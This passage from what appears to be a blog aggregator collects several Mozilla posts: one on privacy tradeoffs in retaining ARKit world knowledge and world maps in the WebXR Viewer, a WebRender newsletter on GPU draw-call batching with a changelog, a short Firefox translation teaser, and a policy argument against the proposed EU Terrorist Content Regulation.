Hypothesis: regardless of how the underlying platform is used, when a new WebXR web page is loaded, it should only get information about the world that that would be available if it was loaded for the first time and not see existing maps or anchors from previous pages.

Consider the image (and video) below. The image shows the results of running the "World Knowledge" sample, and spending a few minutes walking from the second floor of a house, down the stairs to the main floor, around and down the stairs to the basement, and then back up and out the front door into the yard. Looking back at the house, you can see small planes for each stair, the floor and some parts of the walls (they are the translucent green polygons). Even after just a few minutes of running ARKit, a surprising amount of information can be exposed about the interior of a space.

Updating the WebXR Viewer for iOS 12 / ARKit 2.0

If the same user visits another web page, the browser could choose to restart ARKit or not. Restarting results in a high-friction user experience: all knowledge of the world is lost, requiring the user to scan their environment to reinitialize the underlying platform. Not restarting, however, might expose information to the new web page that is surprising to the user. Since the page is visited while outside the house, a user might not expect is to have access to details of the interior.

In the WebXR Viewer, we do not reinitialize ARKit for each page. We made the decision that if a page is reloaded without visiting a different XR page, we leave ARKit running and all world knowledge is retained. This allows pages to be reloaded without completely restarting the experience. When a new WebXR page is visited, we keep ARKit running, but destroy all ARKit anchors and world knowledge (i.e., ARKit ARAnchors, such as ARPlaneAnchors) that are further than some threshold distance from the user (3 meters, by default, in our current implementation).

In the video below, we demonstrate this behavior. When the user changes from "World Knowledge" sample to the "Hit Test" sample, internally we destroy most of the anchors. When the user changes back to the "World Knowledge" sample, we again destroy most of the anchors. You can see at the end of the video that only the nearby planes still exist (the plane under the user and some of the planes on the front porch). Further planes (inside the house, in the case) are gone. (Visiting non-XR pages does not count as visiting another page, although we also shut down ARKit after a short time, to save battery, if the browser is not on an XR page, which destroys all world knowledge as well).

Updating the WebXR Viewer for iOS 12 / ARKit 2.0

While this is a relatively simplistic approach to this tradeoff between friction and privacy, issues like these need to be considered when implementing WebXR inside a browser. Modern AR and VR platforms (such as Microsoft's Hololens or Magic Leap's ML1) are capable of synthesizing and exposing highly detailed maps of the environment, and retaining significant information over time. In these platforms, the world space model is retained over time and exposed to apps, so even if the browser restarts the underlying API for each visited page, the full model of the space is available unless the browser makes an explicit choice to not expose it to the web page.

Consider, for example, a user walking a similar path for a similarly short time in the above house while wearing a Microsoft Hololens. In this case, a map of the same environment is shown below.

Updating the WebXR Viewer for iOS 12 / ARKit 2.0

This image (captured with Microsoft's debugging tools, while the user is sitting at a computer in the basement of the house, shown as the sphere and green view volume) is significantly more detailed that the ARKit planes. And it would be retained, improved and shared with all apps in this space as the user continues to wear and use the Hololens.

In both cases, the ARKit planes and Hololens maps were captured based on just a few minutes of walking in this house. Imagine the level of detail that might be available after extended use.

Platform-specific Capabilities

Hypothesis: advanced capabilities such as World Mapping, that are needed for user experiences that require persistence and sharing content, will need cross-platform analogs to the platform silos currently available if the platform-independent character of the web is to extend to AR and VR.

ARKit 2.0 introduces the possibility of retrieving the current model of the world (the so-called ARWorldMap used by ARKit for tracking planes and anchors in the world. The map can then be saved and/or shared with others, enabling both persistent and multi-user AR experiences.

In this version of the WebXR Viewer, we want to explore some ideas for persistent and shared experiences, so we added session.getWorldMap() and session.setWorldMap(map) commands to an active AR session (these can be seen in the "Persistence" sample, a small change to the "World Knowledge" sample above).

These capabilities raise questions of user-privacy. The ARKit's ARWorldMap is an opaque binary ARKit data struction, and may contain a surprising amount of data about the space that could extracted by determined application developers (the format is undocumented). Because of this, we leverage the existing privacy settings in the WebXR Viewer, and allow apps to retrieve the world map if (and only if) the user has given the page access to "world knowledge".

On the other hand, the WebXR Viewer allows a page to provide an ARWorldMap to ARKit and try and use it for relocalization with no heightened permissions. In theory, such an action could allow a malicious web app to try and "probe" the world by having the browser test if the user is in a certain location. In practice, such an attack seems infeasible: loading a map resets ARKit (a highly disruptive and visible action) and relocalizing the phone against a map takes an indeterminate amount of time regardless of whether the relocalization eventually succeeds or not.

While implementing these commands was trivial, exposing this capability raises a fundamental question for the design of WebXR (beyond questions of permissions and possible threats). Specifically, how might such capabilities eventually work in a cross-platform way, given that each XR platform is implementing these capabilities differently?

We have no answer for this question. For example, some devices, such as Hololens, allow spaces to be saved and shared, much like ARKit. But other platforms opt to only share Anchors, or do not (yet) allow sharing at all. Over time, we hope some common ground might emerge. Google has implemented their ARCore Cloud Anchors on both ARKit and ARCore; perhaps a similar approach could be take that is more open and independent of one companies infrastructure, and could thus be standardized across many platforms.

Looking Forward

These issues are two of many issues that are being discussed and considered by the Immersive Web Community Group as we work on the initial WebXR Device API specification. If you want to see the full power of the various XR platforms exposed and available on the Web, done in a way that preserves the open, accessible and safe character of the Web, please join the discussion and help us ensure the success of the XR Web.

Mozilla GFXWebRender newsletter #31

Greetings! I’ll introduce WebRender’s 31st newsletter with a few words about batching.

Efficiently submitting work to GPUs isn’t as straightforward as one might think. It is not unusual for a CPU renderer to go through each graphic primitive (a blue filled circle, a purple stroked path, and image, etc.) in z-order to produce the final rendered image. While this isn’t the most efficient way, greater care needs to be taken in optimizing the inner loop of the algorithm that renders each individual object than in optimizing the overhead of alternating between various types of primitives. GPUs however, work quite differently, and the cost of submitting small workloads is often higher than the time spent executing them.

I won’t go into the details of why GPUs work this way here, but the big takeaway is that it is best to not think of a GPU API draw call as a way to draw one thing, but rather as a way to submit as many items of the same type as possible. If we implement a shader to draw images, we get much better performance out of drawing many images in a single draw call than submitting a draw call for each image. I’ll call a “batch” any group of items that is rendered with a single drawing command.

So the solution is simply to render all images in a draw call, and then all of the text, then all gradients, right? Well, it’s a tad more complicated because the submission order affects the result. We don’t want a gradient to overwrite text that is supposed to be rendered on top of it, so we have to maintain some guarantees about the order of the submissions for overlapping items.

In the 29th newsletter intro I talked about culling and the way we used to split the screen into tiles to accelerate discarding hidden primitives. This tiling system was also good at simplifying the problem of batching. In order to batch two primitives together we need to make sure that there is no primitive of a different type in between. Comparing all primitives on screen against every other primitive would be too expensive but the tiling scheme reduced this complexity a lot (we then only needed to compare primitives assigned to the same tile).

In the culling episode I also wrote that we removed the screen space tiling in favor of using the depth buffer for culling. This might sound like a regression for the performance of the batching code, but the depth buffer also introduced a very nice property: opaque elements can be drawn in any order without affecting correctness! This is because we store the z-index of each pixel in the depth buffer, so if some text is hidden by an opaque image we can still render the image before the text and the GPU will be configured to automatically discard the pixels of the text that are covered by the image.

In WebRender this means we were able to separate primitives in two groups: the opaque ones, and the ones that need to perform some blending. Batching opaque items is trivial since we are free to just put all opaque items of the same type in their own batch regardless of their painting order. For blended primitives we still need to check for overlaps but we have less primitives to consider. Currently WebRender simply iterates over the last 10 blended primitives to see if there is a suitable batch with no other type of primitive overlapping in between and defaults to starting a new batch. We could go for a more elaborate strategy but this has turned out to work well so far since we put a lot more effort into moving as many primitives as possible into the opaque passes.

In another episode I’ll describe how we pushed this one step further and made it possible to segment primitives into the opaque and non-opaque parts and further reduce the amount of blended pixels.

Notable WebRender and Gecko changes

  • Henrik added reftests for the ImageRendering propertiy: (1), (2) and (3).
  • Bobby changed the way pref changes propagate through WebRender.
  • Bobby improved the texture cache debug view.
  • Bobby improved the texture cache eviction heuristics.
  • Chris fixed the way WebRender activation interacts with the progressive feature rollout system.
  • Chris added a marionette test running on a VM with a GPU.
  • Kats and Jamie experimented with various solution to a driver bug on some Adreno GPUs.
  • Kvark removed some smuggling of clipIds for clip and reference frame items in Gecko’s displaylist building code. This fixed a few existing bugs: (1), (2) and (3).
  • Matt and Jeff added some new telemetry and analyzed the results.
  • Matt added a debugging indicator that moves when a frame takes too long to help with catching performance issues.
  • Andrew landed his work on surface sharing for animated images which fixed most of the outstanding performance issues related to animated images.
  • Andrew completed animated image frame recycling.
  • Lee fixed a bug with sub-pixel glyph positioning.
  • Glenn fixed a crash.
  • Glenn fixed another crash.
  • Glenn reduced the need for full world rect calculation during culling to make it easier to do clustered culling.
  • Nical switched device coordinates to signed integers in order to be able to meet some of the needs of blob image recoordination and simplify some code.
  • Nical added some debug checks to avoid global OpenGL states from the embedder causing issues in WebRender.
  • Sotaro fixed an intermittent timeout.
  • Sotaro fixed a crash on Android related to SurfaceTexture.
  • Sotaro improved the frame synchronization code.
  • Sotaro cleaned up the frame synchronization code some more.
  • Timothy ported img AltFeedback items to WebRender.

Ongoing work

  • Glenn is about to land a major piece of his tiled picture caching work which should solve a lot of the remaining issues with pages that generate too much GPU work.
  • Matt, Dan and Jeff keep investigating into CPU performance, a lot which revolving around many memory copies generated by rustc when moving structures on the stack.
  • Doug is investigating talos performance issues with document splitting.
  • Nical is making progress on improving the invalidation of tiled blob images during scrolling.
  • Kvark keeps catching smugglers in gecko’s displaylist building code.
  • Kats and Jamie are hunting driver bugs on Android.

Enabling WebRender in Firefox Nightly 

In about:config, set the pref “gfx.webrender.all” to true and restart the browser.

Reporting bugs

The best place to report bugs related to WebRender in Firefox is the Graphics :: WebRender component in bugzilla.
Note that it is possible to log in with a github account.

The Firefox FrontierTranslate the Web

Browser extensions make Google Translate even easier to use. With 100+ languages at the ready, Google Translate is the go-to translation tool for millions of people around the world. But … Read more

The post Translate the Web appeared first on The Firefox Frontier.

Mozilla Privacy BlogThe EU Terrorist Content Regulation – a threat to the ecosystem and our users’ rights

In September the European Commission proposed a new regulation that seeks to tackle the spread of ‘terrorist’ content on the internet. As we’ve noted already, the Commission’s proposal would seriously undermine internet health in Europe, by forcing companies to aggressively suppress user speech with limited due process and user rights safeguards. Here we unpack the proposal’s shortfalls, and explain how we’ll be engaging on it to protect our users and the internet ecosystem.  

As we’ve highlighted before, illegal content is symptomatic of an unhealthy internet ecosystem, and addressing it is something that we care deeply about. To that end, we recently adopted an addendum to our Manifesto, in which we affirmed our commitment to an internet that promotes civil discourse, human dignity, and individual expression. The issue is also at the heart of our recently published Internet Health Report, through its dedicated section on digital inclusion.

At the same time lawmakers in Europe have made online safety a major political priority, and the Terrorist Content regulation is the latest legislative initiative designed to tackle illegal and harmful content on the internet. Yet, while terrorist acts and terrorist content are serious issues, the response that the European Commission is putting forward with this legislative proposal is unfortunately ill-conceived, and will have many unintended consequences. Rather than creating a safer internet for European citizens and combating the serious threat of terrorism in all its guises, this proposal would undermine due process online; compel the use of ineffective content filters; strengthen the position of a few dominant platforms while hampering European competitors; and, ultimately, violate the EU’s commitment to protecting fundamental rights.

Many elements from the proposal are worrying, including:

  • The definition of ‘terrorist’ content is extremely broad, opening the door for a huge amount of over-removal (including the potential for discriminatory effect) and the resulting risk that much lawful and public interest speech will be indiscriminately taken down;
  • Government-appointed bodies, rather than independent courts, hold the ultimate authority to determine illegality, with few safeguards in place to ensure these authorities act in a rights-protective manner;
  • The aggressive one hour timetable for removal of content upon notification is barely feasible for the largest platforms, let alone the many thousands of micro, small and medium-sized online services whom the proposal threatens;
  • Companies could be forced to implement ‘proactive measures’ including upload filters, which, as we’ve argued before, are neither effective nor appropriate for the task at hand; and finally,
  • The proposal risks making content removal an end in itself, simply pushing terrorist off the open internet rather than tackling the underlying serious crimes.

As the European Commission acknowledges in its impact assessment, the severity of the measures that it proposes could only ever be justified by the serious nature of terrorism and terrorist content. On its face, this is a plausible assertion. However, the evidence base underlying the proposal does not support the Commission’s approach.  For as the Commission’s own impact assessment concedes, the volume of ‘terrorist’ content on the internet is on a downward trend, and only 6% of Europeans have reported seeing terrorist content online, realities which heighten the need for proportionality to be at the core of the proposal. Linked to this, the impact assessment predicts that an estimated 10,000 European companies are likely to fall within this aggressive new regime, even though data from the EU’s police cooperation agency suggests terrorist content is confined to circa 150 online services.

Moreover, the proposal conflates online speech with offline acts, despite the reality that the causal link between terrorist content online, radicalisation, and terrorist acts is far more nuanced. Within the academic research around terrorism and radicalisation, no clear and direct causal link between terrorist speech and terrorist acts has been established (see in particular, research from UNESCO and RAND). With respect to radicalisation in particular, the broad research suggests exposure to radical political leaders and socio-economic factors are key components of the radicalisation process, and online speech is not a determinant. On this basis, the high evidential bar that is required to justify such a serious interference with fundamental rights and the health of the internet ecosystem is not met by the Commission. And in addition, the shaky evidence base demands that the proposal be subject to far greater scrutiny than it has been afforded thus far.

Besides these concerns, it is saddening that this new legislation is likely to create a legal environment that will entrench the position of the largest commercial services that have the resources to comply, undermining the openness on which a healthy internet thrives. By setting a scope that covers virtually every service that hosts user content, and a compliance bar that only a handful of companies are capable of reaching, the new rules are likely to engender a ‘retreat from the edge’, as smaller, agile services are unable to bear the cost of competing with the established players. In addition, the imposition of aggressive take-down timeframes and automated filtering obligations is likely to further diminish Europe’s standing as a bastion for free expression and due process.

Ultimately, the challenge of building sustainable and rights-protective frameworks for tackling terrorism is a formidable one, and one that is exacerbated when the internet ecosystem is implicated. With that in mind,  we’ll continue to highlight how the nuanced interplay between hosting services, terrorist content, and terrorist acts mean this proposal requires far more scrutiny, deliberation, and clarification. At the very least, any legislation in this space must include far greater rights protection, measures to ensure that suppression of online content doesn’t become an end in itself, and a compliance framework that doesn’t make the whole internet march to the beat of a handful of large companies.

Stay tuned.

The post The EU Terrorist Content Regulation – a threat to the ecosystem and our users’ rights appeared first on Open Policy & Advocacy.